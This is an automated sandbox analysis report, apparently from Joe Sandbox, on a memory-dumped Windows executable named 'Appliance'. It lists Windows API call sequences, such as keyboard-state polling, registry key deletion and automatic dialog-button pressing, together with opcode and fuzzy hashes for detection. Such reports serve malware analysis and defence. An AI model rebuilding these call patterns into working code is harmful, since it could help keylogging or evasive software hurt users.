                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                            • Opcode ID: a4dc19174c9e8099d7cdd6125b2a50fa33ef256c6fdcd74b5c160a3096863e5c
                                                                                                                                            • Instruction ID: 156877008cdf7c10c2facd5995fe1f419e277ffa4f0c75733b4d0f17fa8babe9
                                                                                                                                            • Opcode Fuzzy Hash: a4dc19174c9e8099d7cdd6125b2a50fa33ef256c6fdcd74b5c160a3096863e5c
                                                                                                                                            • Instruction Fuzzy Hash: 1261E1B5D04219AFCB18CFA5DC84AAEBBF6FF48310F208519E555B7250D771AA41CFA0
                                                                                                                                            APIs
                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00E252E6
                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00E25328
                                                                                                                                            • _wcslen.LIBCMT ref: 00E25339
                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00E25345
                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00E2537A
                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00E253B2
                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00E253EB
                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00E25445
                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00E25477
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00E254EF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                                                            • Opcode ID: cc83323fd5b50bf1763845f24fa9a3ae32d81578a060edc0bc489979caed68a1
                                                                                                                                            • Instruction ID: 57ad9b9db5255bef3afa97cc4fb0e70dd8382c626e0a552d8559b5e8992e0150
                                                                                                                                            • Opcode Fuzzy Hash: cc83323fd5b50bf1763845f24fa9a3ae32d81578a060edc0bc489979caed68a1
                                                                                                                                            • Instruction Fuzzy Hash: 7C911972104B16AFD708DF24EA81BA9B7E9FF00308F005519FA56A3091EB71ED55CB91
                                                                                                                                            APIs
                                                                                                                                            • GetMenuItemInfoW.USER32(00E929C0,000000FF,00000000,00000030), ref: 00E2C973
                                                                                                                                            • SetMenuItemInfoW.USER32(00E929C0,00000004,00000000,00000030), ref: 00E2C9A8
                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00E2C9BA
                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00E2CA00
                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00E2CA1D
                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00E2CA49
                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00E2CA90
                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E2CAD6
                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E2CAEB
                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E2CB0C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                            • Opcode ID: 05e1db8c9559736eb7e3cddedf644859362b0f834ff5966c21d3df5d2a547cdd
                                                                                                                                            • Instruction ID: b6c0ec1c2c449e675ae1060038947b642a69ec22372864f45c972e94f8c477fb
                                                                                                                                            • Opcode Fuzzy Hash: 05e1db8c9559736eb7e3cddedf644859362b0f834ff5966c21d3df5d2a547cdd
                                                                                                                                            • Instruction Fuzzy Hash: 3661E2B090026AAFDF25CF64EC89AFE7BB8FB05348F241419E916B3251D771AD44CB61
                                                                                                                                            APIs
                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E2E4D4
                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E2E4FA
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2E504
                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00E2E554
                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E2E570
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                            • Opcode ID: 5acfd2292a162dddadd06c99fbc058533affafdf18ecc29f5901bf2062b38fa6
                                                                                                                                            • Instruction ID: 3be66a84c96b7dcb02c7b4c247ab44e89162e2a16c2c14681c35cd5f3419b3cd
                                                                                                                                            • Opcode Fuzzy Hash: 5acfd2292a162dddadd06c99fbc058533affafdf18ecc29f5901bf2062b38fa6
                                                                                                                                            • Instruction Fuzzy Hash: 3A4142325043247AEB14BB669C47EFF7BACDF55310F10042AF904F6282EBB4DA0192B0
                                                                                                                                            APIs
                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E4D6C4
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00E4D6ED
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E4D7A8
                                                                                                                                              • Part of subcall function 00E4D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00E4D70A
                                                                                                                                              • Part of subcall function 00E4D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00E4D71D
                                                                                                                                              • Part of subcall function 00E4D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E4D72F
                                                                                                                                              • Part of subcall function 00E4D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E4D765
                                                                                                                                              • Part of subcall function 00E4D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E4D788
                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E4D753
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                            • Opcode ID: 4ccbdcb3020c421e37c193c3fbce464846677a2170c265ca3efb17a4f2586ae1
                                                                                                                                            • Instruction ID: 694f8ad79656eedf3deab1de4e1c262765d9210d373e0b9391b4d738489960a2
                                                                                                                                            • Opcode Fuzzy Hash: 4ccbdcb3020c421e37c193c3fbce464846677a2170c265ca3efb17a4f2586ae1
                                                                                                                                            • Instruction Fuzzy Hash: 1D318E71905228BFDB359B91EC88EFFBB7CEF45715F000466F805F2240DA309E499AA0
                                                                                                                                            APIs
                                                                                                                                            • timeGetTime.WINMM ref: 00E2EFCB
                                                                                                                                              • Part of subcall function 00DDF215: timeGetTime.WINMM(?,?,00E2EFEB), ref: 00DDF219
                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00E2EFF8
                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E2F01C
                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E2F03E
                                                                                                                                            • SetActiveWindow.USER32 ref: 00E2F05D
                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E2F06B
                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E2F08A
                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00E2F095
                                                                                                                                            • IsWindow.USER32 ref: 00E2F0A1
                                                                                                                                            • EndDialog.USER32(00000000), ref: 00E2F0B2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                            • String ID: BUTTON
                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                            • Opcode ID: 905ce26f0efa451840816216e5e6446c5ede72a2e01e2c4a45b55e36189b2dc8
                                                                                                                                            • Instruction ID: cc33c92ae04e3657234758ab3fee426130d0a3016c6016a6fb215797bbc6a304
                                                                                                                                            • Opcode Fuzzy Hash: 905ce26f0efa451840816216e5e6446c5ede72a2e01e2c4a45b55e36189b2dc8
                                                                                                                                            • Instruction Fuzzy Hash: 7C215075604325BFE725AF32FC89E267BA9F74974AB001437F506B2372DB718C488662
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E2F374
                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E2F38A
                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2F39B
                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E2F3AD
                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E2F3BE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                                                            • Opcode ID: 141a2d6057197f18727d1aa7f6852f19b24e3a1a0b8c590a46376925372d1057
                                                                                                                                            • Instruction ID: 3f19f178b75448423badd1819165ecbd5129b1e4ca5d7038fa461083a364be9b
                                                                                                                                            • Opcode Fuzzy Hash: 141a2d6057197f18727d1aa7f6852f19b24e3a1a0b8c590a46376925372d1057
                                                                                                                                            • Instruction Fuzzy Hash: 16119131A5026A79D720B265DC4AFFF6A7CEBD1B00F51143AB40AF30D1EAA09D45C6B1
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00DF3007
                                                                                                                                              • Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
                                                                                                                                              • Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60
                                                                                                                                            • _free.LIBCMT ref: 00DF3013
                                                                                                                                            • _free.LIBCMT ref: 00DF301E
                                                                                                                                            • _free.LIBCMT ref: 00DF3029
                                                                                                                                            • _free.LIBCMT ref: 00DF3034
                                                                                                                                            • _free.LIBCMT ref: 00DF303F
                                                                                                                                            • _free.LIBCMT ref: 00DF304A
                                                                                                                                            • _free.LIBCMT ref: 00DF3055
                                                                                                                                            • _free.LIBCMT ref: 00DF3060
                                                                                                                                            • _free.LIBCMT ref: 00DF306E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID: &
                                                                                                                                            • API String ID: 776569668-2586148540
                                                                                                                                            • Opcode ID: 265ea472854097d60b0d64559d88fd114227057643a2e65b56b3486df79d4aca
                                                                                                                                            • Instruction ID: cb1dfb34642a1f782c9b04c02a5bd1aff20d8da548e8250bebe66c7d1c2e6573
                                                                                                                                            • Opcode Fuzzy Hash: 265ea472854097d60b0d64559d88fd114227057643a2e65b56b3486df79d4aca
                                                                                                                                            • Instruction Fuzzy Hash: 9111467651010CAFCB01EF55CD42DFD3B65EF05350B9685A5BA089B122DA32DF919BB0
                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00E2A9D9
                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00E2AA44
                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00E2AA64
                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00E2AA7B
                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00E2AAAA
                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00E2AABB
                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00E2AAE7
                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00E2AAF5
                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00E2AB1E
                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00E2AB2C
                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00E2AB55
                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00E2AB63
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                            • Opcode ID: 57fee5696dd4a0a176b8f1304f8e91ac8dc279a372ad6fba2590948894bed6a1
                                                                                                                                            • Instruction ID: b7ca61d8f68962cb7b3107a9d59cb0a3f38087f0adca653db6c1e8bcf7b454cb
                                                                                                                                            • Opcode Fuzzy Hash: 57fee5696dd4a0a176b8f1304f8e91ac8dc279a372ad6fba2590948894bed6a1
                                                                                                                                            • Instruction Fuzzy Hash: 1B511B609047A82BFB35EB60A851BEABFF55F01344F0C55A9C5C23B1C2DA549B8CC763
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00E26649
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00E26662
                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E266C0
                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00E266D0
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00E266E2
                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E26736
                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00E26744
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00E26756
                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E26798
                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00E267AB
                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E267C1
                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E267CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                            • Opcode ID: a7c367ac3052e9032e5c877282979d09b1bd9998232a0d52b1028b5ce9e5c1c3
                                                                                                                                            • Instruction ID: a3bf7a9d2493c8168bade8db295fc898461860ade6efbbae4a94c26148771c6d
                                                                                                                                            • Opcode Fuzzy Hash: a7c367ac3052e9032e5c877282979d09b1bd9998232a0d52b1028b5ce9e5c1c3
                                                                                                                                            • Instruction Fuzzy Hash: B7512F71A00319AFDF18CF69DD89AAEBBB5FB48315F108629F51AF7290D7709D048B50
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242
                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00DC2152
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                            • Opcode ID: 0389d2467d9f7e7977cc08a11e5aba6a65462274685e0bbfc8e5371acb031829
                                                                                                                                            • Instruction ID: bd9f7932ca3d207b525659bfe4b3f734db826948649dad86f19b05711f26c516
                                                                                                                                            • Opcode Fuzzy Hash: 0389d2467d9f7e7977cc08a11e5aba6a65462274685e0bbfc8e5371acb031829
                                                                                                                                            • Instruction Fuzzy Hash: F141D271104741AFDB349F399C48FB93769EB42335F184609FAA2AB2E1C7318D82DB20
                                                                                                                                            APIs
                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E028D1
                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E028EA
                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E028FA
                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E02912
                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E02933
                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DC11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E02942
                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E0295F
                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DC11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E0296E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 1268354404-2063206799
                                                                                                                                            • Opcode ID: ee48ce58d2afd0f8ea6f39a4c31b9f98ad3957a8ae0b1d8559b8ad93a72e0233
                                                                                                                                            • Instruction ID: 01ce43aea4e1d631662c6899efd71f40eb193bdfbe1e6ee868ac8ac015258577
                                                                                                                                            • Opcode Fuzzy Hash: ee48ce58d2afd0f8ea6f39a4c31b9f98ad3957a8ae0b1d8559b8ad93a72e0233
                                                                                                                                            • Instruction Fuzzy Hash: AB515934A0030AAFDB28DF25CC45FAA7BE5EB89714F10451DFA42A72E1D770E994DB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                              • Part of subcall function 00DC19CD: GetCursorPos.USER32(?), ref: 00DC19E1
                                                                                                                                              • Part of subcall function 00DC19CD: ScreenToClient.USER32(00000000,?), ref: 00DC19FE
